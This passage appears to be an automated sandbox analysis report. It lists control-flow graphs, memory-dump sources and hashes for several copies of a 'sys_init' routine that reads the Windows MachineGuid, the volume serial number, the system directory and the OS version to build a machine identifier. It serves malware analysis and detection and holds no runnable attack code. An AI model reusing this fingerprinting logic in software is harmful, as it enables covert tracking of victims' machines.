7ffe133849ca-7ffe133849d0 247->254 251 7ffe1338498c-7ffe1338498f 248->251 252 7ffe133849a8-7ffe133849ae 248->252 249->221 255 7ffe13384a7d-7ffe13384ada GetVolumeInformationA 249->255 263 7ffe13384b41 250->263 256 7ffe13384995-7ffe13384998 251->256 257 7ffe13384d86-7ffe13384d8b 251->257 258 7ffe133849b4-7ffe133849b9 252->258 259 7ffe13384d9a-7ffe13384d9f 252->259 253->221 260 7ffe13384dae-7ffe13384db3 254->260 261 7ffe133849d6-7ffe133849dc 254->261 264 7ffe13384ae0-7ffe13384b06 GetLastError call 7ffe13382072 255->264 265 7ffe13384bd7-7ffe13384c09 call 7ffe13382072 255->265 266 7ffe13384d90-7ffe13384d95 256->266 267 7ffe1338499e-7ffe133849a3 256->267 257->221 258->221 259->221 260->221 268 7ffe133849de-7ffe133849e3 261->268 269 7ffe133849e8-7ffe133849ed 261->269 263->249 276 7ffe13384b08 264->276 277 7ffe13384b46-7ffe13384b4c 264->277 274 7ffe13384c1d-7ffe13384c24 265->274 275 7ffe13384c0b-7ffe13384c17 strlen 265->275 266->221 267->221 268->221 269->221 279 7ffe13384c28-7ffe13384c85 call 7ffe13382072 274->279 275->274 278 7ffe13384ce9-7ffe13384ced 275->278 282 7ffe13384c8f-7ffe13384c94 276->282 283 7ffe13384b0e-7ffe13384b1b 276->283 280 7ffe13384ca3-7ffe13384ca8 277->280 281 7ffe13384b52 277->281 278->274 287 7ffe13384cf3-7ffe13384cf7 278->287 288 7ffe13384c8a 279->288 280->221 285 7ffe13384b54-7ffe13384b57 281->285 286 7ffe13384b8b-7ffe13384b91 281->286 282->221 283->250 289 7ffe13384b75-7ffe13384b7b 285->289 290 7ffe13384b59-7ffe13384b5c 285->290 291 7ffe13384ccb-7ffe13384cd0 286->291 292 7ffe13384b97-7ffe13384b9d 286->292 287->274 293 7ffe13384cfd-7ffe13384d30 _errno strtol _errno 287->293 288->228 298 7ffe13384cc1-7ffe13384cc6 289->298 299 7ffe13384b81-7ffe13384b86 289->299 296 7ffe13384b62-7ffe13384b65 290->296 297 7ffe13384cad-7ffe13384cb2 290->297 291->221 300 7ffe13384cd5-7ffe13384cda 292->300 301 7ffe13384ba3-7ffe13384ba9 292->301 294 7ffe13384d32-7ffe13384d35 293->294 295 7ffe13384d40-7ffe13384d63 _errno call 7ffe13382072 293->295 294->279 302 7ffe13384d3b 294->302 295->274 304 7ffe13384b6b-7ffe13384b70 296->304 305 7ffe13384cb7-7ffe13384cbc 296->305 297->221 298->221 299->221 300->221 306 7ffe13384cdf-7ffe13384ce4 301->306 307 7ffe13384baf-7ffe13384bb4 301->307 302->274 304->221 305->221 306->221 307->221
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
    • API String ID: 3828489143-883582248
    • Opcode ID: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
    • Instruction ID: 315e19cb864d6292cb640a6bbbda15ace2c298b922fc62e136cc44729451c1c0
    • Opcode Fuzzy Hash: ab038bee8234f97caf7f98465cb859aae6a65c5825cd4cb70bab40e8f46f15f3
    • Instruction Fuzzy Hash: 7CD15D21E0CE52CDFB608717E4403BC26A1AB70775F1546FAC96E77EB4DE2DA8848349

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 309 7ffe0e13210c-7ffe0e132126 call 7ffe0e132a34 312 7ffe0e132648 309->312 313 7ffe0e13212c-7ffe0e132141 call 7ffe0e1329b3 309->313 316 7ffe0e13265c-7ffe0e132661 312->316 317 7ffe0e132143-7ffe0e132171 313->317 318 7ffe0e132197 313->318 319 7ffe0e1321a9-7ffe0e1321c0 call 7ffe0e1340d2 316->319 325 7ffe0e132173-7ffe0e132178 317->325 326 7ffe0e13217a-7ffe0e132195 call 7ffe0e1340d2 317->326 320 7ffe0e13219c-7ffe0e1321a7 FreeLibrary 318->320 324 7ffe0e1321c5-7ffe0e1321d2 319->324 320->319 323 7ffe0e1321d3-7ffe0e13220c GetNativeSystemInfo GetWindowsDirectoryA 320->323 327 7ffe0e1322f0-7ffe0e132313 call 7ffe0e1340d2 323->327 328 7ffe0e132212-7ffe0e132233 GetLastError call 7ffe0e1340d2 323->328 325->320 326->320 327->319 337 7ffe0e132319-7ffe0e13234f call 7ffe0e133402 327->337 335 7ffe0e132235 328->335 336 7ffe0e132253-7ffe0e132259 328->336 338 7ffe0e132249-7ffe0e13224e 335->338 339 7ffe0e132237-7ffe0e132244 335->339 336->316 340 7ffe0e13225f-7ffe0e132265 336->340 347 7ffe0e132400-7ffe0e13241c call 7ffe0e1340d2 337->347 348 7ffe0e132355-7ffe0e132357 337->348 338->319 339->338 342 7ffe0e13229e-7ffe0e1322a4 340->342 343 7ffe0e132267-7ffe0e13226a 340->343 349 7ffe0e132684-7ffe0e132689 342->349 350 7ffe0e1322aa-7ffe0e1322b0 342->350 345 7ffe0e132288-7ffe0e13228e 343->345 346 7ffe0e13226c-7ffe0e13226f 343->346 357 7ffe0e132294-7ffe0e132299 345->357 358 7ffe0e13267a-7ffe0e13267f 345->358 354 7ffe0e132275-7ffe0e132278 346->354 355 7ffe0e132666-7ffe0e13266b 346->355 361 7ffe0e132421 347->361 348->319 356 7ffe0e13235d-7ffe0e1323ba GetVolumeInformationA 348->356 349->319 351 7ffe0e13268e-7ffe0e132693 350->351 352 7ffe0e1322b6-7ffe0e1322bc 350->352 351->319 359 7ffe0e1322be-7ffe0e1322c3 352->359 360 7ffe0e1322c8-7ffe0e1322cd 352->360 362 7ffe0e132670-7ffe0e132675 354->362 363 7ffe0e13227e-7ffe0e132283 354->363 355->319 364 7ffe0e1323c0-7ffe0e1323e6 GetLastError call 7ffe0e1340d2 356->364 365 7ffe0e1324b7-7ffe0e1324e9 call 7ffe0e1340d2 356->365 357->319 358->319 359->319 360->319 361->348 362->319 363->319 372 7ffe0e1323e8 364->372 373 7ffe0e132426-7ffe0e13242c 364->373 370 7ffe0e1324fd-7ffe0e132504 365->370 371 7ffe0e1324eb-7ffe0e1324f7 strlen 365->371 375 7ffe0e132508-7ffe0e132565 call 7ffe0e1340d2 370->375 371->370 374 7ffe0e1325c9-7ffe0e1325cd 371->374 378 7ffe0e1323ee-7ffe0e1323fb 372->378 379 7ffe0e13256f-7ffe0e132574 372->379 376 7ffe0e132432 373->376 377 7ffe0e132583-7ffe0e132588 373->377 374->370 380 7ffe0e1325d3-7ffe0e1325d7 374->380 385 7ffe0e13256a 375->385 382 7ffe0e132434-7ffe0e132437 376->382 383 7ffe0e13246b-7ffe0e132471 376->383 377->319 378->347 379->319 380->370 384 7ffe0e1325dd-7ffe0e132610 _errno call 7ffe0e1429b8 _errno 380->384 386 7ffe0e132455-7ffe0e13245b 382->386 387 7ffe0e132439-7ffe0e13243c 382->387 388 7ffe0e132477-7ffe0e13247d 383->388 389 7ffe0e1325ab-7ffe0e1325b0 383->389 402 7ffe0e132620-7ffe0e132643 _errno call 7ffe0e1340d2 384->402 403 7ffe0e132612-7ffe0e132615 384->403 385->324 393 7ffe0e1325a1-7ffe0e1325a6 386->393 394 7ffe0e132461-7ffe0e132466 386->394 391 7ffe0e132442-7ffe0e132445 387->391 392 7ffe0e13258d-7ffe0e132592 387->392 395 7ffe0e1325b5-7ffe0e1325ba 388->395 396 7ffe0e132483-7ffe0e132489 388->396 389->319 398 7ffe0e132597-7ffe0e13259c 391->398 399 7ffe0e13244b-7ffe0e132450 391->399 392->319 393->319 394->319 395->319 400 7ffe0e1325bf-7ffe0e1325c4 396->400 401 7ffe0e13248f-7ffe0e132494 396->401 398->319 399->319 400->319 401->319 402->370 403->375 404 7ffe0e13261b 403->404 404->370
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
    • API String ID: 3828489143-883582248
    • Opcode ID: fde8f6f1b3ef3eafbfe813b66c9eb851002a437269388e927bd3a53b743e4f08
    • Instruction ID: f3c228d3f79a12cdca37816df22e435133b57a7defac2bae4d4095a693300235
    • Opcode Fuzzy Hash: fde8f6f1b3ef3eafbfe813b66c9eb851002a437269388e927bd3a53b743e4f08
    • Instruction Fuzzy Hash: 3ED143A2E0C65281FB20AB64F8403B876A0EF85794F650133DADE173B5DE3DE985C781

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 701 7ffe126d6e0c-7ffe126d6e26 call 7ffe126d7734 704 7ffe126d6e2c-7ffe126d6e41 call 7ffe126d76b3 701->704 705 7ffe126d7348 701->705 710 7ffe126d6e97 704->710 711 7ffe126d6e43-7ffe126d6e71 704->711 707 7ffe126d735c-7ffe126d7361 705->707 709 7ffe126d6ea9-7ffe126d6ec0 call 7ffe126d77a2 707->709 715 7ffe126d6ec5-7ffe126d6ed2 709->715 712 7ffe126d6e9c-7ffe126d6ea7 FreeLibrary 710->712 719 7ffe126d6e7a-7ffe126d6e95 call 7ffe126d77a2 711->719 720 7ffe126d6e73-7ffe126d6e78 711->720 712->709 714 7ffe126d6ed3-7ffe126d6f0c GetNativeSystemInfo GetWindowsDirectoryA 712->714 717 7ffe126d6f12-7ffe126d6f33 GetLastError call 7ffe126d77a2 714->717 718 7ffe126d6ff0-7ffe126d7013 call 7ffe126d77a2 714->718 727 7ffe126d6f53-7ffe126d6f59 717->727 728 7ffe126d6f35 717->728 718->709 729 7ffe126d7019-7ffe126d704f call 7ffe126dd3f2 718->729 719->712 720->712 727->707 730 7ffe126d6f5f-7ffe126d6f65 727->730 732 7ffe126d6f37-7ffe126d6f44 728->732 733 7ffe126d6f49-7ffe126d6f4e 728->733 739 7ffe126d7055-7ffe126d7057 729->739 740 7ffe126d7100-7ffe126d711c call 7ffe126d77a2 729->740 734 7ffe126d6f67-7ffe126d6f6a 730->734 735 7ffe126d6f9e-7ffe126d6fa4 730->735 732->733 733->709 737 7ffe126d6f6c-7ffe126d6f6f 734->737 738 7ffe126d6f88-7ffe126d6f8e 734->738 741 7ffe126d6faa-7ffe126d6fb0 735->741 742 7ffe126d7384-7ffe126d7389 735->742 743 7ffe126d7366-7ffe126d736b 737->743 744 7ffe126d6f75-7ffe126d6f78 737->744 746 7ffe126d737a-7ffe126d737f 738->746 747 7ffe126d6f94-7ffe126d6f99 738->747 739->709 745 7ffe126d705d-7ffe126d70ba GetVolumeInformationA 739->745 757 7ffe126d7121 740->757 748 7ffe126d6fb6-7ffe126d6fbc 741->748 749 7ffe126d738e-7ffe126d7393 741->749 742->709 743->709 751 7ffe126d6f7e-7ffe126d6f83 744->751 752 7ffe126d7370-7ffe126d7375 744->752 753 7ffe126d71b7-7ffe126d71e9 call 7ffe126d77a2 745->753 754 7ffe126d70c0-7ffe126d70e6 GetLastError call 7ffe126d77a2 745->754 746->709 747->709 755 7ffe126d6fc8-7ffe126d6fcd 748->755 756 7ffe126d6fbe-7ffe126d6fc3 748->756 749->709 751->709 752->709 764 7ffe126d71eb-7ffe126d71f7 strlen 753->764 765 7ffe126d71fd-7ffe126d7204 753->765 762 7ffe126d7126-7ffe126d712c 754->762 763 7ffe126d70e8 754->763 755->709 756->709 757->739 769 7ffe126d7132 762->769 770 7ffe126d7283-7ffe126d7288 762->770 766 7ffe126d70ee-7ffe126d70fb 763->766 767 7ffe126d726f-7ffe126d7274 763->767 764->765 768 7ffe126d72c9-7ffe126d72cd 764->768 771 7ffe126d7208-7ffe126d7265 call 7ffe126d77a2 765->771 766->740 767->709 768->765 772 7ffe126d72d3-7ffe126d72d7 768->772 773 7ffe126d716b-7ffe126d7171 769->773 774 7ffe126d7134-7ffe126d7137 769->774 770->709 778 7ffe126d726a 771->778 772->765 781 7ffe126d72dd-7ffe126d7310 _errno call 7ffe126e25d0 _errno 772->781 779 7ffe126d72ab-7ffe126d72b0 773->779 780 7ffe126d7177-7ffe126d717d 773->780 776 7ffe126d7139-7ffe126d713c 774->776 777 7ffe126d7155-7ffe126d715b 774->777 782 7ffe126d728d-7ffe126d7292 776->782 783 7ffe126d7142-7ffe126d7145 776->783 784 7ffe126d72a1-7ffe126d72a6 777->784 785 7ffe126d7161-7ffe126d7166 777->785 778->715 779->709 786 7ffe126d7183-7ffe126d7189 780->786 787 7ffe126d72b5-7ffe126d72ba 780->787 794 7ffe126d7312-7ffe126d7315 781->794 795 7ffe126d7320-7ffe126d7343 _errno call 7ffe126d77a2 781->795 782->709 789 7ffe126d714b-7ffe126d7150 783->789 790 7ffe126d7297-7ffe126d729c 783->790 784->709 785->709 791 7ffe126d72bf-7ffe126d72c4 786->791 792 7ffe126d718f-7ffe126d7194 786->792 787->709 789->709 790->709 791->709 792->709 794->771 797 7ffe126d731b 794->797 795->765 797->765
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
    • API String ID: 3828489143-883582248
    • Opcode ID: bda70ea524b49ecb178049aaa29923fcfeb8a31155ef0d5133f67201ab185293
    • Instruction ID: 89bfad26da5fb5eb3afefbf8782fee188894321ca03475694ad316b106b0c015
    • Opcode Fuzzy Hash: bda70ea524b49ecb178049aaa29923fcfeb8a31155ef0d5133f67201ab185293
    • Instruction Fuzzy Hash: 60D15C21E1CE9F86FB259B17EC807B86260AF50774F1901B6D98D072F4DEADED458382

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 603 7ffe11ec348c-7ffe11ec34a6 call 7ffe11ec3db4 606 7ffe11ec39c8 603->606 607 7ffe11ec34ac-7ffe11ec34c1 call 7ffe11ec3d33 603->607 610 7ffe11ec39dc-7ffe11ec39e1 606->610 611 7ffe11ec3517 607->611 612 7ffe11ec34c3-7ffe11ec34f1 607->612 613 7ffe11ec3529-7ffe11ec3540 call 7ffe11ec1352 610->613 614 7ffe11ec351c-7ffe11ec3527 FreeLibrary 611->614 621 7ffe11ec34fa-7ffe11ec3515 call 7ffe11ec1352 612->621 622 7ffe11ec34f3-7ffe11ec34f8 612->622 618 7ffe11ec3545-7ffe11ec3552 613->618 614->613 617 7ffe11ec3553-7ffe11ec358c GetNativeSystemInfo GetWindowsDirectoryA 614->617 619 7ffe11ec3670-7ffe11ec3693 call 7ffe11ec1352 617->619 620 7ffe11ec3592-7ffe11ec35b3 GetLastError call 7ffe11ec1352 617->620 619->613 631 7ffe11ec3699-7ffe11ec36cf call 7ffe11ecba62 619->631 629 7ffe11ec35b5 620->629 630 7ffe11ec35d3-7ffe11ec35d9 620->630 621->614 622->614 632 7ffe11ec35c9-7ffe11ec35ce 629->632 633 7ffe11ec35b7-7ffe11ec35c4 629->633 630->610 634 7ffe11ec35df-7ffe11ec35e5 630->634 643 7ffe11ec3780-7ffe11ec379c call 7ffe11ec1352 631->643 644 7ffe11ec36d5-7ffe11ec36d7 631->644 632->613 633->632 636 7ffe11ec35e7-7ffe11ec35ea 634->636 637 7ffe11ec361e-7ffe11ec3624 634->637 641 7ffe11ec3608-7ffe11ec360e 636->641 642 7ffe11ec35ec-7ffe11ec35ef 636->642 639 7ffe11ec362a-7ffe11ec3630 637->639 640 7ffe11ec3a04-7ffe11ec3a09 637->640 645 7ffe11ec3636-7ffe11ec363c 639->645 646 7ffe11ec3a0e-7ffe11ec3a13 639->646 640->613 651 7ffe11ec39fa-7ffe11ec39ff 641->651 652 7ffe11ec3614-7ffe11ec3619 641->652 648 7ffe11ec39e6-7ffe11ec39eb 642->648 649 7ffe11ec35f5-7ffe11ec35f8 642->649 655 7ffe11ec37a1 643->655 644->613 650 7ffe11ec36dd-7ffe11ec373a GetVolumeInformationA 644->650 653 7ffe11ec3648-7ffe11ec364d 645->653 654 7ffe11ec363e-7ffe11ec3643 645->654 646->613 648->613 656 7ffe11ec39f0-7ffe11ec39f5 649->656 657 7ffe11ec35fe-7ffe11ec3603 649->657 658 7ffe11ec3837-7ffe11ec3869 call 7ffe11ec1352 650->658 659 7ffe11ec3740-7ffe11ec3766 GetLastError call 7ffe11ec1352 650->659 651->613 652->613 653->613 654->613 655->644 656->613 657->613 666 7ffe11ec387d-7ffe11ec3884 658->666 667 7ffe11ec386b-7ffe11ec3877 strlen 658->667 664 7ffe11ec3768 659->664 665 7ffe11ec37a6-7ffe11ec37ac 659->665 668 7ffe11ec38ef-7ffe11ec38f4 664->668 669 7ffe11ec376e-7ffe11ec377b 664->669 671 7ffe11ec3903-7ffe11ec3908 665->671 672 7ffe11ec37b2 665->672 673 7ffe11ec3888-7ffe11ec38e5 call 7ffe11ec1352 666->673 667->666 670 7ffe11ec3949-7ffe11ec394d 667->670 668->613 669->643 670->666 674 7ffe11ec3953-7ffe11ec3957 670->674 671->613 675 7ffe11ec37eb-7ffe11ec37f1 672->675 676 7ffe11ec37b4-7ffe11ec37b7 672->676 681 7ffe11ec38ea 673->681 674->666 678 7ffe11ec395d-7ffe11ec3990 _errno call 7ffe11ed0bd8 _errno 674->678 682 7ffe11ec37f7-7ffe11ec37fd 675->682 683 7ffe11ec392b-7ffe11ec3930 675->683 679 7ffe11ec37b9-7ffe11ec37bc 676->679 680 7ffe11ec37d5-7ffe11ec37db 676->680 696 7ffe11ec39a0-7ffe11ec39c3 _errno call 7ffe11ec1352 678->696 697 7ffe11ec3992-7ffe11ec3995 678->697 687 7ffe11ec390d-7ffe11ec3912 679->687 688 7ffe11ec37c2-7ffe11ec37c5 679->688 689 7ffe11ec3921-7ffe11ec3926 680->689 690 7ffe11ec37e1-7ffe11ec37e6 680->690 681->618 684 7ffe11ec3935-7ffe11ec393a 682->684 685 7ffe11ec3803-7ffe11ec3809 682->685 683->613 684->613 691 7ffe11ec393f-7ffe11ec3944 685->691 692 7ffe11ec380f-7ffe11ec3814 685->692 687->613 694 7ffe11ec3917-7ffe11ec391c 688->694 695 7ffe11ec37cb-7ffe11ec37d0 688->695 689->613 690->613 691->613 692->613 694->613 695->613 696->666 697->673 698 7ffe11ec399b 697->698 698->666
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
    • API String ID: 3828489143-883582248
    • Opcode ID: 51ada386e532f8475c008fe7cb94cea0cf59d83d9d3ce4fff3dcb342ec4b0357
    • Instruction ID: 17bcc248a9a5fa588ba1b49b82196b18f062142d9cf9d6f43443fe5fbcff63f6
    • Opcode Fuzzy Hash: 51ada386e532f8475c008fe7cb94cea0cf59d83d9d3ce4fff3dcb342ec4b0357
    • Instruction Fuzzy Hash: F9D15B62E0CE5381FB2087D7EC403BB6268AB15B74F9920B6D94E177B4DE2DFA448741

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 407 7ffe0e16c25c-7ffe0e16c276 call 7ffe0e16bc64 410 7ffe0e16c27c-7ffe0e16c291 call 7ffe0e16bbe3 407->410 411 7ffe0e16c798 407->411 416 7ffe0e16c293-7ffe0e16c2c1 410->416 417 7ffe0e16c2e7 410->417 414 7ffe0e16c7ac-7ffe0e16c7b1 411->414 415 7ffe0e16c2f9-7ffe0e16c310 call 7ffe0e16c852 414->415 420 7ffe0e16c315-7ffe0e16c322 415->420 425 7ffe0e16c2c3-7ffe0e16c2c8 416->425 426 7ffe0e16c2ca-7ffe0e16c2e5 call 7ffe0e16c852 416->426 418 7ffe0e16c2ec-7ffe0e16c2f7 FreeLibrary 417->418 418->415 422 7ffe0e16c323-7ffe0e16c35c GetNativeSystemInfo GetWindowsDirectoryA 418->422 423 7ffe0e16c362-7ffe0e16c383 GetLastError call 7ffe0e16c852 422->423 424 7ffe0e16c440-7ffe0e16c463 call 7ffe0e16c852 422->424 433 7ffe0e16c385 423->433 434 7ffe0e16c3a3-7ffe0e16c3a9 423->434 424->415 435 7ffe0e16c469-7ffe0e16c49f call 7ffe0e165192 424->435 425->418 426->418 436 7ffe0e16c399-7ffe0e16c39e 433->436 437 7ffe0e16c387-7ffe0e16c394 433->437 434->414 438 7ffe0e16c3af-7ffe0e16c3b5 434->438 447 7ffe0e16c4a5-7ffe0e16c4a7 435->447 448 7ffe0e16c550-7ffe0e16c56c call 7ffe0e16c852 435->448 436->415 437->436 440 7ffe0e16c3ee-7ffe0e16c3f4 438->440 441 7ffe0e16c3b7-7ffe0e16c3ba 438->441 443 7ffe0e16c7d4-7ffe0e16c7d9 440->443 444 7ffe0e16c3fa-7ffe0e16c400 440->444 445 7ffe0e16c3bc-7ffe0e16c3bf 441->445 446 7ffe0e16c3d8-7ffe0e16c3de 441->446 443->415 451 7ffe0e16c7de-7ffe0e16c7e3 444->451 452 7ffe0e16c406-7ffe0e16c40c 444->452 454 7ffe0e16c3c5-7ffe0e16c3c8 445->454 455 7ffe0e16c7b6-7ffe0e16c7bb 445->455 449 7ffe0e16c3e4-7ffe0e16c3e9 446->449 450 7ffe0e16c7ca-7ffe0e16c7cf 446->450 447->415 456 7ffe0e16c4ad-7ffe0e16c50a GetVolumeInformationA 447->456 459 7ffe0e16c571 448->459 449->415 450->415 451->415 457 7ffe0e16c40e-7ffe0e16c413 452->457 458 7ffe0e16c418-7ffe0e16c41d 452->458 460 7ffe0e16c7c0-7ffe0e16c7c5 454->460 461 7ffe0e16c3ce-7ffe0e16c3d3 454->461 455->415 462 7ffe0e16c510-7ffe0e16c536 GetLastError call 7ffe0e16c852 456->462 463 7ffe0e16c607-7ffe0e16c639 call 7ffe0e16c852 456->463 457->415 458->415 459->447 460->415 461->415 468 7ffe0e16c538 462->468 469 7ffe0e16c576-7ffe0e16c57c 462->469 470 7ffe0e16c64d-7ffe0e16c654 463->470 471 7ffe0e16c63b-7ffe0e16c647 strlen 463->471 472 7ffe0e16c53e-7ffe0e16c54b 468->472 473 7ffe0e16c6bf-7ffe0e16c6c4 468->473 475 7ffe0e16c582 469->475 476 7ffe0e16c6d3-7ffe0e16c6d8 469->476 477 7ffe0e16c658-7ffe0e16c6b5 call 7ffe0e16c852 470->477 471->470 474 7ffe0e16c719-7ffe0e16c71d 471->474 472->448 473->415 474->470 478 7ffe0e16c723-7ffe0e16c727 474->478 479 7ffe0e16c584-7ffe0e16c587 475->479 480 7ffe0e16c5bb-7ffe0e16c5c1 475->480 476->415 487 7ffe0e16c6ba 477->487 478->470 484 7ffe0e16c72d-7ffe0e16c760 _errno call 7ffe0e174610 _errno 478->484 485 7ffe0e16c5a5-7ffe0e16c5ab 479->485 486 7ffe0e16c589-7ffe0e16c58c 479->486 482 7ffe0e16c6fb-7ffe0e16c700 480->482 483 7ffe0e16c5c7-7ffe0e16c5cd 480->483 482->415 488 7ffe0e16c705-7ffe0e16c70a 483->488 489 7ffe0e16c5d3-7ffe0e16c5d9 483->489 500 7ffe0e16c762-7ffe0e16c765 484->500 501 7ffe0e16c770-7ffe0e16c793 _errno call 7ffe0e16c852 484->501 493 7ffe0e16c6f1-7ffe0e16c6f6 485->493 494 7ffe0e16c5b1-7ffe0e16c5b6 485->494 491 7ffe0e16c592-7ffe0e16c595 486->491 492 7ffe0e16c6dd-7ffe0e16c6e2 486->492 487->420 488->415 